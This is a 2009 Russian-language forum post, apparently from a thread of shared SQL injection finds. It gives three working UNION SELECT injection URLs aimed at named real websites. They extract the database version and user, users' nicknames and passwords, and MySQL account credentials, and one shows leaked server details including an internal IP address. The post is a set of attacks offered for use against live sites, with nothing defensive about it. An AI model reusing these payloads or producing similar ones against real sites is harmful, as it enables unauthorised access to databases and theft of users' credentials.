  20. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    Code:
    http://la2-shop.ru/categories.php?id_cat=-13'+union+select+concat_ws(0x3a,version(),database(),user())+--+
    
    4.1.22-log:tok_center_la2:tok-center_mysql@10.1.31.126
    Code:
    http://www.nazgulowen.com/blog.php?id=-12+union+select+concat_ws(0x3a,id,nick,name,password)+from+users/*
    вывод в мета контенте
    Code:
    http://www.vero-software.com/news_detail.php?id=999999999+union+select+1,2,concat_ws(0x3a,user,password),4,5,6+from+mysql.user--
    
     
    #11260 warlok, 14 Dec 2009
    Last edited by a moderator: 14 Dec 2009
    3 people like this.
Loading...
Thread Status:
Not open for further replies.